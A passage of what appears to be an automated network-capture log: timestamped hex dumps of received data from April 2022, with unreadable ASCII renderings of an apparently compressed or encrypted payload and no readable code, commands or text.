7e b5 4d c6 86 ba 6f 58 84 07 2a ca 9d 8c cf ea c2 77 cd 06 4c 0a 05 12 63
                                                                              Data Ascii: >#79%by1Tmc@)a7v79l%w|koVPNHlyoy}wW<wLN<W3l`+DCb/gf|X;6et^:<YZzq2A@8k[YO,V}f'?>pZ.M~V]3Ix~MoX*wLc
                                                                              2022-04-26 19:08:56 UTC180INData Raw: 1e 63 81 3e 07 62 25 6d ed 83 b5 bb 8b 10 b1 3f a3 6b 84 1c 03 10 b0 04 df 80 3c ca 7c ea 32 aa 20 0e 2b 28 bd 92 50 2c 24 49 14 d6 58 19 5b 94 90 a3 04 87 d4 30 b5 bc f2 1c 0e 3c ec b4 7d 27 63 5b 1a 18 f6 25 75 b1 a1 bb 6d 51 64 89 bc 27 26 3e 5a 02 c7 84 94 f8 a5 50 77 c9 e7 f0 53 08 0a fa 1c 89 08 aa 08 c9 60 d0 f2 c0 0c 91 19 2a 99 be 72 b1 6e 6c f0 97 32 6d 93 98 68 ea 30 63 b7 dd 97 ed 9d cc 60 16 f6 62 54 69 b4 92 b4 d5 16 41 b8 e4 6e 29 33 04 b7 ef 48 bc 2c e9 08 03 9a 44 a4 0e 5f 46 8c 23 53 08 66 64 07 c5 ab ed 70 2b a3 0e 1d fc 96 35 cb d5 c3 04 af f6 d2 cf 25 df fd 0f 3f 22 b5 45 76 79 2a 31 29 fa 73 8f c2 eb 7d 6d f7 c4 e6 81 b8 16 79 7b 36 12 9a 69 32 89 c4 73 f8 57 e1 0c 7b 1f c3 46 05 69 76 61 6f 9c f2 d5 00 63 7c a7 e1 0b f8 30 5c 58 1d
                                                                              Data Ascii: c>b%m?k<|2 +(P,$IX[0<}'c[%umQd'&>ZPwS`*rnl2mh0c`bTiAn)3H,D_F#Sfdp+5%?"Evy*1)s}my{6i2sW{Fivaoc|0\X
                                                                              2022-04-26 19:08:56 UTC184INData Raw: 0b 77 f1 04 e7 50 cf b2 e0 7c f8 84 40 64 8f 8c 83 6e e3 6e 6d 16 96 6e 72 d7 3e 08 a6 ed 12 c7 ad a7 4f c9 84 a6 61 e5 df 51 91 cf f1 2b c5 e7 fd ce cd 38 d8 75 a7 29 2d d5 ae f5 65 96 f3 47 ba 34 08 b8 0a 9a 49 76 74 b9 78 90 f0 f4 39 da 00 e5 8c 83 67 bd 83 46 c5 e8 fb 58 0b 17 a5 14 f5 e7 b3 f6 8c 5d 01 63 a4 6c 62 e7 55 d7 51 84 4e 4e 9b d6 5d 32 26 6b 75 1e e3 0d 21 f3 f5 31 dc b0 43 88 d0 7c 02 b7 65 60 19 68 00 8a fb 6d 7a de 99 1e d5 19 f3 86 bf c4 51 cb 44 27 89 cb a0 cb 78 cd 1c 11 21 18 60 87 1c 31 fe 7c 7c 33 16 93 bf 91 18 2f 67 31 29 a2 33 26 ff 5c 2b 14 64 ce 39 be bf e3 b4 a2 b9 5d 60 b3 08 91 ea ef a1 91 7b 5a 89 15 0e 39 4f 43 b0 01 f2 3c 76 e1 78 40 dc cd 43 05 32 5b e0 1a e0 ad 4e 5b 28 9e a4 65 77 d6 fc 9a d2 5a 24 67 93 48 6d 40 50
                                                                              Data Ascii: wP|@dnnmnr>OaQ+8u)-eG4Ivtx9gFX]clbUQNN]2&ku!1C|e`hmzQD'x!`1||3/g1)3&\+d9]`{Z9OC<vx@C2[N[(ewZ$gHm@P
                                                                              2022-04-26 19:08:56 UTC188INData Raw: 82 fd c4 c7 f5 ba 22 58 18 c7 c7 a6 e0 b9 96 95 d4 f3 4f 94 3e 1b c6 5e dc 45 63 2b 16 4f 97 76 56 7e 56 07 86 a5 76 59 2c b4 5c 2f 8e 58 db 96 67 e1 75 b8 35 8d aa a9 54 bc 3d 33 57 81 69 19 27 8b b6 ac 77 ad 5d 90 9f b6 ab 1a 68 90 94 8d a5 dd 91 b0 4d 02 89 f9 6a d7 ab ef fb 11 97 67 e1 58 85 47 8b ac 8d 1b 43 ab 59 7a 46 cf 52 2d d1 65 4b 4b 32 6d 58 ce fd 85 65 55 0e 8b 33 9b c3 36 09 a3 1e 60 41 6e 61 1c 8d 49 a9 0d 91 11 89 1b 6c 89 f3 31 30 80 f3 25 56 af cb 08 a6 2e 4f 06 0a 0c 9a ff ad f9 e2 97 9d d7 58 03 e0 3a 97 66 b2 12 97 0f f3 79 f9 ec 8a f2 8a aa 13 54 1f 86 4d ac 4c 25 c2 e7 0d 83 07 c9 0d 31 f1 ff 25 8c bb a3 d5 5e 20 ef 53 7b a3 ab a0 7b de 93 5a 41 23 59 94 57 f7 a8 f9 3a 29 d7 bb 2f 93 18 0d b0 97 ac 81 82 7c bd 42 e2 79 9e af da 67
                                                                              Data Ascii: "XO>^Ec+OvV~VvY,\/Xgu5T=3Wi'w]hMjgXGCYzFR-eKK2mXeU36`AnaIl10%V.OX:fyTML%1%^ S{{ZA#YW:)/|Byg
                                                                              2022-04-26 19:08:56 UTC193INData Raw: c4 47 7e 5c 27 96 d2 44 19 62 d3 d8 be f0 b7 45 26 9b 08 39 b2 d7 cf 1f 7f 4c b9 e7 5a 58 bd b7 b3 0e f8 e2 d1 99 e1 ba b7 71 c4 20 1e 53 2d b0 da 4a 0a b4 17 73 5f 2e 86 24 72 26 31 1d 10 80 7f 69 55 0f 82 2f d9 47 a3 ae 5b 17 86 f1 b1 3d 42 48 52 88 45 d1 3c 51 dc 22 52 05 3f b5 9d 1d f6 96 7d 16 da 7e 2b 69 cf ca bf 65 d1 45 04 18 f3 9f 67 a7 98 8c 22 cc 28 1f 3c 9e de fa 34 e5 3f 66 47 31 13 17 1f cb 49 ca 03 3c 03 a7 86 5b db 9f 6c 52 bd 19 15 d0 49 1f 2a a9 16 f7 23 24 53 e6 40 98 1f 98 a6 5a ea 30 e6 8a 30 e2 80 12 02 b0 69 08 b1 99 9a a7 5c d0 7c 25 76 41 9e 74 04 99 5e 88 44 bb 5d b6 f3 22 47 43 61 dd 51 6b 41 82 1c cc 41 b2 e9 e2 88 56 31 c2 e5 a1 eb f2 97 4d 49 6e ff dd c0 95 47 7b 3b df 7f d4 7e fd cb de 8a ea 04 45 43 08 46 f0 b0 3b 39 ec 57
                                                                              Data Ascii: G~\'DbE&9LZXq S-Js_.$r&1iU/G[=BHRE<Q"R?}~+ieEg"(<4?fG1I<[lRI*#$S@Z00i\|%vAt^D]"GCaQkAAV1MInG{;~ECF;9W
                                                                              2022-04-26 19:08:56 UTC197INData Raw: 83 62 e4 1f 9a 09 be b7 c7 89 9f 3b 80 17 16 52 b1 84 53 c4 73 90 9a 8e 07 e5 9f bb 51 59 2c 73 68 4f be 2b 8c ab 5c 71 fa f6 d9 7d f2 55 5d a4 3d bd e4 e9 bc 8f a3 6f 35 23 b6 62 8c b0 9b 60 f0 88 22 31 ba 2d 44 40 b4 90 48 40 a5 d3 9e 9b 0a 8b fa 55 d8 ce 36 5b e3 df 4b 77 fb 08 ab 56 92 1a 68 05 6d 7f ef 9d 41 62 e5 b7 54 a3 13 92 80 f1 49 eb 93 f1 a2 73 9e 0d 34 3d 48 7d d3 8a 4d 9a 56 4a 59 3c cb 00 87 49 ab 1b 44 83 c6 ea c4 a9 a3 f6 de d5 0e 54 1b ec 86 82 0c d2 85 89 c5 90 2d 27 60 92 81 2b 79 1f c2 d4 a5 31 07 65 5d 1c d2 27 68 09 1a d4 d6 f7 e8 9a 4d f8 d9 9d e9 e5 09 07 80 be 0e fe 0b bc 48 9f 24 63 89 c1 4f 5a 36 52 9e 68 c1 f3 32 04 ad 5d ae f2 b6 af 64 a6 17 20 1c 78 ec 10 0b 6b 25 77 ab 8b b0 84 1e 51 3d 41 4c 2d 63 80 4f 0d 1b b5 60 d0 f0
                                                                              Data Ascii: b;RSsQY,shO+\q}U]=o5#b`"1-D@H@U6[KwVhmAbTIs4=H}MVJY<IDT-'`+y1e]'hMH$cOZ6Rh2]d xk%wQ=AL-cO`
                                                                              2022-04-26 19:08:56 UTC201INData Raw: 8e fa 16 d6 6a 68 61 20 8e db 59 67 bd 79 af 89 90 38 c9 e3 9d a4 da 51 f9 fb aa 98 96 7b 23 e9 07 08 d8 b8 e0 c9 07 ef ce 63 c0 ac c0 d0 64 d8 40 a9 59 18 5b d9 69 4c a9 cd 9c 3f 7e a9 3c 5d e9 cf 0e 61 f9 5b 5a 9e 91 06 a0 0c b7 ee a2 a2 cb a7 e6 49 a9 3c f8 c2 7a d0 4e 64 0e 8e 6c 4e b4 89 0c 01 44 65 6f 4d 29 c6 2b 7b e1 bf 08 ab 99 5d 38 3d b5 37 52 29 10 53 ef bc 14 85 bb 12 68 a1 6e 21 a7 3f 29 ce ab f8 98 64 8d 08 4d ce 03 08 de 07 5c 53 89 be 70 9a e4 47 cf 79 df 3d 2d 87 65 8f dc 2d 44 5f ae 76 af 55 5f 53 33 cd 2c 4d 4f 20 5f c7 bf e2 63 f1 ce cd ed 06 19 cb f7 b3 99 77 21 de f5 8b 94 71 c4 5d 63 13 22 c8 4d 19 0e e3 5c 1c bb 9d 46 7e 6b c2 3a 72 c1 ba 5c 01 05 c3 9a f6 c2 b0 9a f3 a0 c5 3f 15 a1 0d 44 9f a6 52 a6 37 28 03 90 a3 ed 07 60 c0 9a
                                                                              Data Ascii: jha Ygy8Q{#cd@Y[iL?~<]a[ZI<zNdlNDeoM)+{]8=7R)Shn!?)dM\SpGy=-e-D_vU_S3,MO _cw!q]c"M\F~k:r\?DR7(`
                                                                              2022-04-26 19:08:56 UTC205INData Raw: f6 0b af bf ae 98 44 e7 71 57 bf 08 d1 34 5d 07 25 71 7f c9 7d ee 1c 52 5f 76 95 c9 6d 26 6c ed b0 93 16 28 91 8f 1d 77 d8 31 96 95 3a 37 0c 82 7f 18 89 57 f0 a4 c3 eb 36 44 2b 43 d6 23 48 93 08 8f da db 0d 84 d1 b9 e4 bd 70 b9 16 0d e4 48 7f 0f 23 98 f6 e6 54 79 fd 67 6c cc 5f de a1 e2 24 19 e1 3f e5 4c e8 03 72 09 42 38 7f 9e 21 83 c7 cf 6d ee 9a 02 fe be 8c c1 34 f7 d3 82 e6 f6 9b 81 f8 39 62 a9 45 f8 c6 fc 86 50 9f f7 27 64 84 3f 56 a1 4b 02 da 45 c8 ae f1 5f 6c 2c cd c6 83 44 75 d6 17 d5 06 2d a8 10 dc 39 12 d6 40 58 ad 16 bc d3 59 5a fe a0 99 7a ff 95 e2 9c 3a 3b 7e 9b ed 5e ad 2c 3c 55 af 8d c7 5c 59 f7 a9 ae 52 70 b8 eb 5a 51 d9 ac b9 78 c1 c7 29 5b 1b c9 98 33 83 b5 09 7e c9 04 10 a2 3b a6 c5 13 20 d0 de 0d b3 45 21 15 28 d3 1a 61 a7 83 d2 22 f3
                                                                              Data Ascii: DqW4]%q}R_vm&l(w1:7W6D+C#HpH#Tygl_$?LrB8!m49bEP'd?VKE_l,Du-9@XYZz:;~^,<U\YRpZQx)[3~; E!(a"
                                                                              2022-04-26 19:08:56 UTC208INData Raw: 27 5b 9f 31 18 f3 c6 15 3c c7 84 4f b6 a8 35 a8 9e c1 f4 3e 41 8f 2b c3 6c e4 1f 71 3f 03 6e f2 d5 9f 82 30 a7 64 a7 c4 43 20 fb 19 31 72 f7 90 50 3e 3f 92 30 29 94 9c 90 39 a5 f6 94 fb b2 ce 27 53 c9 cf 13 d0 c4 b6 4b 75 61 b9 72 a4 5b d1 92 15 7a 9d c6 9d b4 32 ca 02 e8 b8 a9 05 c9 23 45 03 8a 8a 8a 6d ed ea 1c 7b 3e 09 42 71 ee 89 e1 27 49 56 b4 ef bb ef 66 c2 3e 84 cf ce 6a 27 13 57 0f 55 24 7d 5e 28 e6 e5 f2 5d 11 79 69 e8 da 83 b4 0f cc df be 63 ba 43 ed c4 1d 48 14 d8 8a 13 6e 4e fc 66 66 11 20 a2 50 67 6e d4 47 9f 3a 6b 36 6a 16 3b f8 e3 73 99 2e 7f 24 fd 50 1d 6b 8c d9 87 ab dd 81 99 12 95 bc 7b 31 0a e8 c0 5e 3e 1d e9 97 bb a4 54 12 97 04 2b 3b c3 93 8f 02 32 ee 2f 66 79 70 bf 15 4e 4b e7 32 38 72 72 ee 66 e3 0a 7f b4 5e cb 6a 7e 60 36 dd 10 d7
                                                                              Data Ascii: '[1<O5>A+lq?n0dC 1rP>?0)9'SKuar[z2#Em{>Bq'IVf>j'WU$}^(]yicCHnNff PgnG:k6j;s.$Pk{1^>T+;2/fypNK28rrf^j~`6
                                                                              2022-04-26 19:08:56 UTC212INData Raw: fc a1 c4 f4 3a 6a 5c 4e 61 84 e6 2c 61 eb e8 7a 7c 7a d4 d1 63 38 bb 27 67 bf 20 e3 8b d1 28 1c 87 37 41 af 82 f6 e8 ae 77 1d 9e 44 85 fe 39 c9 4a 9d da 38 ae a6 79 31 67 b0 05 81 80 c2 8b de 6f 2d ef ab 9b 20 ea 90 ea 96 bb 38 70 9e d6 b7 6c a7 55 6c 00 14 11 71 53 a7 77 c3 f2 1d 83 26 a7 b3 d8 2e 44 9b 91 08 2d cb 0f 6e ac 34 ff f0 3f 62 b7 d2 ce ce d3 57 b8 4c b4 8d a4 fc 4c d4 fc 65 d0 06 a4 ef 72 31 63 20 be b5 88 04 a5 5b 3f 6b 4e 6c ef 60 75 d7 e3 7d 3c 6c ee a8 f5 10 c0 2c 76 f6 93 94 ab 4d c0 ac b5 9e 73 a1 a2 0c 8c 58 92 ee 1e 6e d7 2c f5 68 6c 67 a1 66 be 79 e4 51 c7 43 26 dc bc 6b 51 e2 06 61 1e 97 fb b4 10 32 f6 66 87 cd 5b be a4 7b 23 6b 59 5f 82 0d c1 7a 90 27 5d dd 8e 71 8d 7f 85 aa d1 1e c9 34 76 8b ce 0b 78 76 62 12 d6 a3 b3 25 80 25 d1
                                                                              Data Ascii: :j\Na,az|zc8'g (7AwD9J8y1go- 8plUlqSw&.D-n4?bWLLer1c [?kNl`u}<l,vMsXn,hlgfyQC&kQa2f[{#kY_z']q4vxvb%%
                                                                              2022-04-26 19:08:56 UTC228INData Raw: e7 e0 8b c1 f5 99 16 7c be 88 54 d5 8f da 25 0c 46 41 3a 79 86 bf ce 1f c8 b8 84 c9 89 ca 5e c0 9d fa 8a 3b 81 02 1f 1e e6 29 fd 30 a5 3c 79 a9 22 61 5e b8 5b bb 29 65 f9 83 23 a0 64 fc 75 7c 3b 14 f9 eb f4 8a 92 2e e4 40 fd 60 25 5e 93 d2 e9 3f 4f de 6c d0 da fe 08 2f b9 37 44 cd 15 37 b3 1f d4 4b 81 75 0d 84 14 69 ae 7f ea 43 df 09 25 9d 1d de 81 c8 08 97 07 c8 ef e1 16 57 e1 27 fd 7f e7 46 98 e1 88 24 b3 4c f2 09 7c 93 1c d6 a9 ef 97 24 76 8a fa 51 e3 31 1e b7 8e 83 e0 0b 93 b2 cf 3a 12 55 14 bd 99 a7 1a 8e e2 71 6a c6 5e 85 c2 b2 76 c1 ae f9 94 f5 38 82 48 ad b7 7c 8c 01 56 4c 73 00 54 ae f3 96 06 f7 2f c3 57 31 e9 bd d6 fb 69 b1 cc 51 37 97 d0 ff 5e 2e 59 11 2c 87 e9 28 f1 f4 1b f0 1c 25 c0 f9 b6 3f c7 7d b2 1f 75 b2 d3 53 06 41 98 3c 6d 04 7b cb 72
                                                                              Data Ascii: |T%FA:y^;)0<y"a^[)e#du|;.@`%^?Ol/7D7KuiC%W'F$L|$vQ1:Uqj^v8H|VLsT/W1iQ7^.Y,(%?}uSA<m{r
                                                                              2022-04-26 19:08:56 UTC240INData Raw: ba 93 36 7f 09 f7 0d ff 3c a1 bf e6 f1 06 10 e0 73 e0 2b 50 83 23 51 4c 14 e8 76 e2 f1 4f b0 a2 95 d1 19 f4 58 df 62 67 45 7c 43 72 6e ee 1a 29 d3 3e ac 0a 73 5b a0 e3 76 36 66 a8 4f 21 7b 71 2d 5c 44 68 06 f6 e9 e0 6d 47 13 6a 22 45 d6 3b c4 75 5b da 61 f5 09 6c 34 25 f2 47 2a 23 a3 e9 9f 4d 73 bc 78 3e 16 be 42 d0 23 91 61 52 80 fc ae fe bb b8 a3 be 93 8b 6e 75 d7 6c 44 fa 68 44 6a f9 6c b5 ce 35 a8 a2 16 87 fd bb 54 78 90 6d da 1a f7 2d eb 32 9b c5 66 f8 15 18 7f 92 25 56 4e a8 92 87 01 57 3a a5 b4 4d f8 35 e1 d2 8b 43 67 51 e9 9c 61 9e 7c 50 d9 ad 1f f7 bd ca d0 57 2c 31 b6 82 58 da 46 11 08 d5 e7 9a b9 7a 7f f7 6c b7 b3 fa 80 c7 9c c0 2a d6 00 eb ee ae 42 d5 5d 8a e3 c6 32 d7 61 75 9e 52 93 92 67 c8 c1 f5 21 d8 c3 94 06 25 d4 a1 3b 23 c9 55 28 89 dd
                                                                              Data Ascii: 6<s+P#QLvOXbgE|Crn)>s[v6fO!{q-\DhmGj"E;u[al4%G*#Msx>B#aRnulDhDjl5Txm-2f%VNW:M5CgQa|PW,1XFzl*B]2auRg!%;#U(
                                                                              2022-04-26 19:08:56 UTC256INData Raw: 81 dd 7b d9 83 fd 0e fd 84 f5 d7 a0 ae ac 69 da 0a 24 f4 96 b8 f0 da 67 94 df dc 21 b6 33 d6 b5 76 b2 78 2c 98 9b b4 f4 01 9e 27 73 5f 4d da 20 44 bd b2 f6 61 ba e3 eb 41 62 0c 42 33 36 62 1a cb a0 c1 b8 f6 0e 86 32 f8 97 db f5 fb 73 12 4d d6 d6 a2 e0 22 94 88 b0 92 d0 c1 bf df a6 d3 30 e5 51 15 1f d8 40 24 84 92 05 28 1b 7f 93 74 50 bb ab 3d 2a 93 1b d4 30 78 2b 75 8b d5 84 9a 3f 40 a2 d1 8c 5b 39 c2 a2 b2 bc 11 d3 65 9a 59 7f c5 85 95 8a 4c 21 7b f5 a2 71 72 de 62 13 73 1e 9e 42 52 d3 2d d1 45 3e 3e 32 e9 6d 99 4b 32 eb ee d9 2c ea 32 65 64 fb cd cf a7 a0 69 cb 88 b9 00 99 ce 71 ea 67 bd 06 05 65 ff f7 a1 a3 3b 08 33 37 0f 3a e2 91 9c be 6b e4 9b eb 12 72 ff 1c 30 5a a1 92 b9 c5 66 9f 56 71 04 f5 47 16 de b0 ab 05 52 0d 4a d7 e2 90 2a c4 bf 19 02 4b b0
                                                                              Data Ascii: {i$g!3vx,'s_M DaAbB36b2sM"0Q@$(tP=*0x+u?@[9eYL!{qrbsBR-E>>2mK2,2ediqge;37:kr0ZfVqGRJ*K
                                                                              2022-04-26 19:08:56 UTC272INData Raw: cb dd 54 ea 79 df ee c1 45 e1 bd 58 09 c5 86 5b 15 be 4a b3 48 ef bd a0 ef 8b be 1b 29 2e 0d e1 ad fc e4 f4 88 fb c2 4c 0d 98 a2 27 6b 31 1d d4 ad 2e 3f d3 6f fe f3 b5 3b 7f 2e c4 91 ad a1 0d 46 6d 8f e9 e5 c7 08 67 63 4c fd 7b f9 43 5c 49 66 1c 14 54 67 e2 0d 3d e7 ba b2 7b 5b 48 4c f0 06 73 6f fa e5 1c 6e a2 1c f4 f9 0e 4c e3 e0 ee 50 49 bf 6e d8 1c 80 bf 2b 94 25 cc 71 5f 60 91 3c 5f 06 7e 9e 4f bc 0d d5 ec 9d f4 02 ab 8b 9c d5 ed 6e 20 2f fe 4d 4d f2 e2 4e de ba ba 08 6d 8f de 97 b6 6b 4f ec 4a f8 43 04 a2 63 f0 af 16 e1 56 39 ca 9b 42 a3 80 fd f2 e7 ef 04 17 7f 7b 8a b3 8d 4d bd e6 d5 17 69 51 38 f3 f4 92 c4 56 88 27 b7 c8 99 39 6a 2a 48 85 70 29 e4 aa 3d 47 b0 ee 0c 8b 63 b2 c5 99 52 73 ab 7e c1 1e 42 e7 f6 fb 3f d0 45 3a ef 8c 27 7e a4 cd 33 a2 39
                                                                              Data Ascii: TyEX[JH).L'k1.?o;.FmgcL{C\IfTg={[HLsonLPIn+%q_`<_~On /MMNmkOJCcV9B{MiQ8V'9j*Hp)=GcRs~B?E:'~39
                                                                              2022-04-26 19:08:56 UTC288INData Raw: b5 ea 8c ed 2d a4 25 29 81 22 d5 52 01 aa d2 6a c6 59 ab 53 6c 99 3a 73 e5 6b d9 14 80 8c c5 ff 95 c4 5e a6 2a 0b 37 ac 91 69 3c bb e0 d8 10 8e e1 78 98 de df a8 ad c1 d7 6b a7 fa e3 87 2d 4f ce 26 52 5b 37 1f 84 31 e5 78 fb 8a ce 26 0d 25 8b ad 8e 73 3b b7 75 b7 21 95 62 78 c5 7b b5 98 94 15 1c 73 90 fb 43 ca 4d da 5d d7 0b ab 55 18 5a 39 6d 40 e3 e5 2a bb a3 1d c5 41 66 32 e3 63 9b bf c1 aa 54 43 53 af 02 25 5a 75 31 85 94 f4 e5 23 4e af 20 80 59 a9 cf 1f 24 20 22 a8 ab 2c f1 46 d2 bf 40 c4 09 96 2c 02 b1 fb f8 6c 90 7f 53 8e 1d a0 9b 2b b8 36 26 fe 1d 87 fd 45 6a 07 96 29 47 6b a9 16 c8 56 47 ae 0e 71 54 aa b3 de 03 a4 5b 22 a3 1b bf a9 e9 3f f4 a5 13 42 cf 0c a7 3e 4c 36 58 01 3c 39 74 89 3e 25 1b 74 e7 d2 e9 27 19 9a 1a 88 d7 b8 a3 67 36 89 96 75 56
                                                                              Data Ascii: -%)"RjYSl:sk^*7i<xk-O&R[71x&%s;u!bx{sCM]UZ9m@*Af2cTCS%Zu1#N Y$ ",F@,lS+6&Ej)GkVGqT["?B>L6X<9t>%t'g6uV
                                                                              2022-04-26 19:08:56 UTC304INData Raw: 45 b7 ea c1 1a 87 e7 aa 73 bb 6f bc ae 64 0a f7 45 46 ae 8a 26 37 61 c9 a7 04 88 a2 a1 97 e1 66 df e8 3e 6f 65 db d3 e9 d8 b1 b2 d7 0f e1 11 99 37 f8 b8 49 92 5b d3 d3 4a 7c ce 1d 8c b0 bf f1 ef 56 3a b5 6f 55 89 b8 09 c1 98 4d 0f 1f d5 1d 0a 94 22 27 95 af e5 47 f9 dc 5a e8 63 b6 14 fc 29 56 38 70 86 e9 bb 5c 6c 64 55 f6 92 68 2b e8 d6 c9 9e de 7d 48 fc b6 5a 69 48 36 70 07 e6 b0 b3 89 15 ce 9c 9f e0 db b9 b4 22 ef 04 3e 06 f2 76 3e 20 15 7c 7b a3 2c 77 67 0b dc ef 98 b4 95 37 36 2a 99 0b dd 60 a1 58 78 c7 65 e1 77 fd ec f0 fc ce 3c 3c ce ba 9a 6a b0 53 20 0c 8c 9f d2 fd 56 c2 8d a0 70 f8 a7 a0 eb bf 8f a4 c2 f0 63 f3 f0 90 40 fe 3d c3 75 1a f5 4f 4f 11 c7 85 30 e5 e7 56 b7 d3 ce b8 2e e0 ab 31 4d 11 f7 23 ce f2 f6 18 ff 64 eb bd d4 74 25 28 83 5c 3b 00
                                                                              Data Ascii: EsodEF&7af>oe7I[J|V:oUM"'GZc)V8p\ldUh+}HZiH6p">v> |{,wg76*`Xxew<<jS Vpc@=uOO0V.1M#dt%(\;
                                                                              2022-04-26 19:08:56 UTC320INData Raw: 4a 44 fe 3d 2e 60 8d 1b a6 b1 d3 9d e5 4b fa ee 7b 0e a8 08 8f a7 81 2d 1d 47 8b ce 1f 36 83 9f b0 5a eb dc d4 a5 32 51 ef 49 06 5a 96 8e 15 9f 3e 7a e4 39 b7 dc 91 ab 43 1e 5f 81 e4 4f 73 c7 85 48 86 ce 4f 84 b3 3a dc a8 44 a9 bf 0d 04 db 99 e5 23 9c c4 e4 d0 b5 9b d4 30 c3 8c 12 19 2a bf 5b a1 33 f1 9a 02 5e ff ea e2 cb eb 21 de 34 67 90 a5 7f af c8 88 73 3f 25 96 16 95 96 c5 0f 62 7f 71 fb 4c ed 6f 7c 67 02 bc dc c5 07 ef 32 cc ed 7e 9d d1 18 04 cb bb f3 23 ea 80 9e 27 40 31 28 db ef 4f df 30 df 2d f0 4b 42 e7 66 37 53 c6 48 72 95 97 1f f5 8f 10 da 9d 3b 7e 36 f1 bb b5 ef 3b 92 bd 33 e3 a2 5e fc 69 fa 6a 68 e9 21 43 f3 39 f3 3b ee c4 30 4f 76 13 e5 d9 94 b4 06 a5 59 6e 88 24 4b b3 1d bd 54 cd b7 d4 80 a6 70 49 65 6e 48 81 4e 0e e0 61 49 d9 af cc 47 08
                                                                              Data Ascii: JD=.`K{-G6Z2QIZ>z9C_OsHO:D#0*[3^!4gs?%bqLo|g2~#'@1(O0-KBf7SHr;~6;3^ijh!C9;0OvYn$KTpIenHNaIG
                                                                              2022-04-26 19:08:56 UTC336INData Raw: 42 c8 2f 33 35 d5 57 eb 17 bd 8f c5 51 55 cb 70 84 1e 57 e8 5d 3f 42 bc 01 17 4b bd 27 2b 51 7c 3b 2a d0 44 48 ef 9b 10 72 de 76 17 60 11 12 fd f2 6f c5 b6 4a dc 66 86 41 41 2a d1 c6 12 35 a3 c8 f3 b8 3b 53 5c 0e b9 f7 8b fd 99 69 b1 18 2f 9a 3c 55 02 d9 5c 8b 20 79 80 32 8f 8b fd 9b 52 2c f5 df d9 35 f0 1d d2 3d 81 5a 7d 41 79 e2 41 a8 cc 77 1e 47 f6 00 76 b1 7b 02 7d c8 89 6b 77 0a 54 28 4b 32 4e 48 47 3b 70 47 b7 b6 d8 be 88 fa da 8b e4 9e 60 5b 97 e2 4a 08 ab d4 e1 15 0f 37 36 9c 68 8d ef cb 6b 41 17 98 97 55 11 d6 d8 ba 99 ec 4d 0b 2c 3e e6 dd 6d b3 d2 07 e6 10 bf b2 ec 11 b0 44 98 4a 70 de f9 96 e8 a4 10 07 5a 46 1d 28 2f df dd 2d a4 23 03 70 96 cc 73 24 4b 74 d7 b7 b1 f8 93 c7 e5 db b0 93 8f 0f 81 8e 22 62 74 bf 57 b3 ea de 5f 15 46 e6 9c a6 ea 82
                                                                              Data Ascii: B/35WQUpW]?BK'+Q|;*DHrv`oJfAA*5;S\i/<U\ y2R,5=Z}AyAwGv{}kwT(K2NHG;pG`[J76hkAUM,>mDJpZF(/-#ps$Kt"btW_F
                                                                              2022-04-26 19:08:56 UTC352INData Raw: ca a6 8f 8a cd 5d 34 c5 b8 6e 75 5f d6 3c ac f0 cf 2d 4b 6e 67 48 6a 53 e6 e8 fb 2f 9e b8 ce 19 3f ba 43 67 66 8e a1 18 45 54 be c0 94 30 70 8e b0 d2 40 57 dd e3 b6 3e fc 27 d4 f7 bd 4b bd 64 8c 3c 4b 3a 0a 72 10 c0 00 46 cf 3d d8 98 a8 1b f7 36 76 c6 a2 21 47 31 51 a3 36 e4 cd 74 c1 b5 f1 fa 69 5b 87 2a a8 b4 2e 1b 01 aa 4c 7a 5d c7 ac ce fd 78 02 a2 0d 23 86 b1 a2 15 67 f8 7f 6b d8 64 62 09 72 71 fa cc 73 82 8b e2 1d 4f 3c ba eb 9c 53 2e 53 7b 3a 03 b9 34 7f 6e 03 c3 48 ae 9b 04 3d 53 9f ac ee 34 75 39 9d 69 1a 47 7f ad 50 e2 16 3a ca 34 f4 a1 08 76 34 5f c8 57 46 dc fe 51 38 58 13 fc e7 3d ae de 65 a7 c4 71 55 dd 46 08 3d 3c 57 21 6b 70 bf cb 1b e2 d0 b8 4b 52 ab b3 25 a9 d8 84 ba 8f d5 31 bd 30 c5 b8 3c a2 96 d6 50 ff 78 6b f5 7e f9 6b e7 a7 41 61 4a
                                                                              Data Ascii: ]4nu_<-KngHjS/?CgfET0p@W>'Kd<K:rF=6v!G1Q6ti[*.Lz]x#gkdbrqsO<S.S{:4nH=S4u9iGP:4v4_WFQ8X=eqUF=<W!kpKR%10<Pxk~kAaJ
                                                                              2022-04-26 19:08:56 UTC368INData Raw: 87 fe a4 b7 f1 77 e6 0f 0a f7 b3 9b 83 bc 4c d0 ea ad d6 b8 4a be 20 67 65 6d 34 ac a3 04 31 9a cc c9 a8 76 83 2d f2 1b 08 28 32 35 c3 7b c6 c4 7e 20 d9 a2 4a 74 f2 d1 d6 c5 ce 2e e7 5d ce de 27 cf 03 71 00 a1 e1 68 29 72 31 82 48 6e c4 d5 36 27 5c d9 73 66 b2 ad 51 6b 21 0d 7c ec 37 8b 74 00 27 72 25 c6 d2 66 c4 e7 fa 92 2a 64 6f 6e c5 fb a7 6e 50 d9 dd f0 ea 0d d8 ad fd 1c 90 7e 12 d5 35 6f 7f 6d ad c1 08 b2 8b db 25 1e fd 17 f8 33 24 88 a0 17 7f 90 18 4c ad 03 a2 76 9c 25 bc 00 e7 f6 f1 44 67 7b e7 45 8d 96 da b8 e9 3b d2 04 3d 5c af ab 14 eb a9 aa 02 9b 23 72 85 3b e3 e0 71 fb 4e 05 0a 7f 0b c0 fa 25 3e 75 30 c0 f7 0f 3b 39 d0 e7 47 49 a7 c5 c9 6e b2 a6 52 a5 33 8a 0e 43 76 8e 81 42 3e 0f 3b 85 3c 38 f2 ac c1 00 33 20 f2 a8 f0 bb eb 08 8f 47 2d 64 29
                                                                              Data Ascii: wLJ gem41v-(25{~ Jt.]'qh)r1Hn6'\sfQk!|7t'r%f*donnP~5om%3$Lv%Dg{E;=\#r;qN%>u0;9GInR3CvB>;<83 G-d)
